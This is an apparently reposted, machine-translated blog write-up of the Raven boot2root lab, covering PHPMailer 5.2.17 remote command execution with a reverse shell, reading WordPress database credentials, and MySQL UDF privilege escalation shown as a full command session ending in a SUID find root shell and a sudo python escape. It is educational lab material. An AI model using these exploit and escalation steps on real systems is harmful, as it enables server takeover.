当前位置:网站首页>Skyler's actual combat penetration notes (III) - Raven

Skyler's actual combat penetration notes (III) - Raven

2021-09-15 04:28:47 XuepengZ

skyler Actual combat penetration notes :

Note taking is to record the actual combat penetration learning process , Share ideas and methods of penetration process .

Please note that :

For terminals or servers reproduced in all notes , They are self built or authorized to penetrate . The technology used is for learning and educational purposes only , If the technologies listed are used for any other purpose , I'm not responsible for .

0x00 Preface

0x01 information gathering

0x02 penetration get shell

0x03 Raise the right

0x04 summary

 

 

 

0x00 Preface

Today's goal , Is a Debian Machine , There are 4 individual flag, And two getshell Methods , Let's see .

0x01 information gathering

The first thing is to find the target :

 

Set goals IP 192.168.245.143, Then scan the port to see :

0x02 penetration getshell

Looks like it's on 22 Of ssh port ,80 Of web port , And a special rpcbind Service port , Then I subconsciously think that this port should have an opportunity to use , But start with 80 Visit :

It's a blog System , I ordered it everywhere and found nothing :

 

Scan the catalog and try :

  First, check the source code for each page in the normal directory , Found the first flag

http://192.168.245.143/service.html

 

 

  The scan found several special directories , Visit one by one :

http://192.168.245.143/manual/en/index.html

The middleware found here is apache 2.4

http://192.168.245.143/vendor/

 

 

 

 

 

  Here is phpmail The catalog of , It found the current phpmailer The version is 5.2.17

Search the Internet ,phpmailer This version has a vulnerability in remote command execution

 

OK,expolit Search to see if there is an attack script :

 

 

  Here I tried first .sh Script for , Execute error report after copying , Checked and reported the wrong content , Because of this from windows The copied script , Line breaks are inconsistent , So use dos2unix The conversion can be executed .

 

 

Executed the script , Also get a remote shell, But the command cannot echo . Try again python Script for :

Modify the parameters in the script :

 

  Error during compilation execution , I found Chinese characters in it , Add this sentence at the beginning :# -*- coding: utf-8 -*

 

  Re execution , Missing library found ,pip install requests-toolbelt install

 

Recompile execution

 

After success , stay kali Local open port listening 8888, And access http://192.168.245.143/back.php, get shell And rebound bash

 

  Get permission , Found a low privileged user , Don't worry , First search for a wave flag

find / -name "*flag*"

 

 

OK, Succeed in getting the second flag, And there's a... in the catalog wordpress A subdirectory ,wordpress It is a tool for building a station with one click , that cd Go to the subdirectory and see what information there is :

View the configuration file , Found the user name and password of the database :cat wp-config.php

 

OK, Let's first look at the permissions of the database :

 0x03 Raise the right

 

 

 root Running mysql. Before learning sql At the time of Injection , After successful injection, the right raising method is mentioned udf Raise the right , Just try it :

 

  see mysql edition 5.5.60

 

  In the second , Copy 1518.c And compile and generate dynamic link library files (DLL)

gcc -g -c 1518.c

gcc -g  -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc

 

  Turn on python The server python -m SimpleHTTPServer 5555 , And download... On the target machine 1518.so

 

OK, Log in to mysql, Start udf Raise the right :

mysql -uroot [email protected]

The specific method is as follows :

 1 mysql> show databases;
 2 show databases;
 3 +--------------------+
 4 | Database           |
 5 +--------------------+
 6 | information_schema |
 7 | mysql              |
 8 | performance_schema |
 9 | wordpress          |
10 +--------------------+
11 4 rows in set (0.22 sec)
12 
13 mysql> use wordpress
14 use wordpress
15 Reading table information for completion of table and column names
16 You can turn off this feature to get a quicker startup with -A
17 
18 Database changed
19 mysql> create table foo(line blob);
20 create table foo(line blob);
21 Query OK, 0 rows affected (0.43 sec)
22 
23 mysql> insert into foo values(load_file('/var/www/html/1518.so'));
24 insert into foo values(load_file('/var/www/html/1518.so'));
25 Query OK, 1 row affected (0.10 sec)
26 
27 mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
28 select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
29 Query OK, 1 row affected (0.06 sec)
30 
31 mysql> create function do_system returns integer soname '1518.so';
32 create function do_system returns integer soname '1518.so';
33 Query OK, 0 rows affected (0.10 sec)
34 
35 mysql> select * from mysql.func;
36 select * from mysql.func;
37 +-----------+-----+---------+----------+
38 | name      | ret | dl      | type     |
39 +-----------+-----+---------+----------+
40 | do_system |   2 | 1518.so | function |
41 +-----------+-----+---------+----------+
42 1 row in set (0.00 sec)
43 
44 mysql> select do_system('chmod u+s /usr/bin/find');
45 select do_system('chmod u+s /usr/bin/find');
46 +--------------------------------------+
47 | do_system('chmod u+s /usr/bin/find') |
48 +--------------------------------------+
49 |                                    0 |
50 +--------------------------------------+
51 1 row in set (0.02 sec)
52 mysql> quit
53 quit
54 Bye
55 www-data@Raven:/var/www/html$ touch foo
56 touch foo
57 www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
58 find foo -exec 'whoami' \;
59 root
60 www-data@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
61 find foo -exec '/bin/sh' \;
62 # whoami
63 whoami
64 root
65 # pwd
66 pwd
67 /var/www/html
68 # cd /root
69 cd /root
70 # ls
71 ls
72 flag4.txt
73 # cat flag4.txt
74 cat flag4.txt
75 ______
76 
77 | ___ \
78 
79 | |_/ /__ ___   _____ _ __
80 
81 |    // _` \ \ / / _ \ '_ \
82 
83 | |\ \ (_| |\ V /  __/ | | |
84 
85 \_| \_\__,_| \_/ \___|_| |_|
86 
87 
88 flag4{715dea6c055b9fe3337544932f2941ce}
89 
90 CONGRATULATIONS on successfully rooting Raven!
91 
92 This is my first Boot2Root VM - I hope you enjoyed it.
93 
94 Hit me up on Twitter and let me know what you thought:
95 
96 @mccannwj / wjmccann.github.io

Mention right to success , In addition, in the database , And some unexpected discoveries :

 

 posts In the table , Found two flag:

 

  There's another one user surface , see :

 

Found two users and encrypted passwords , Try md5 Decrypt :

michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

 

 

The first one didn't work out , the second :

 

 

 

 OK, Untie , Try logging in to see :

ssh [email protected]

 

 

Came in , View user permissions

 

 

 

Found to work python, So directly python Raise the right :

sudo python -c 'import pty; pty.spawn("/bin/bash")'

 

 

  Take down !

 

 

 

 

 

 0x04 summary

UDF Raise the right :

take udf Put the file in the specified location (Mysql>5.1 Put it in Mysql Root directory lib\plugin Under the folder )

from udf Introduce custom functions into the file (user defined function)

Execute custom function

dumpfile Usually used to read binary files , No damage

create function do_system Is the new function we added , Used to execute system commands

chmod u+s Denotes the owner of a program with suid jurisdiction , Can be like root Operate like a user , That is to say, to find Command highest authority

find / -exec ‘/bin/sh’ ; Final right raising , Give the highest permission under the root directory 1
 

 

版权声明
本文为[XuepengZ]所创,转载请带上原文链接,感谢
https://chowdera.com/2021/09/20210909112445616Q.html

随机推荐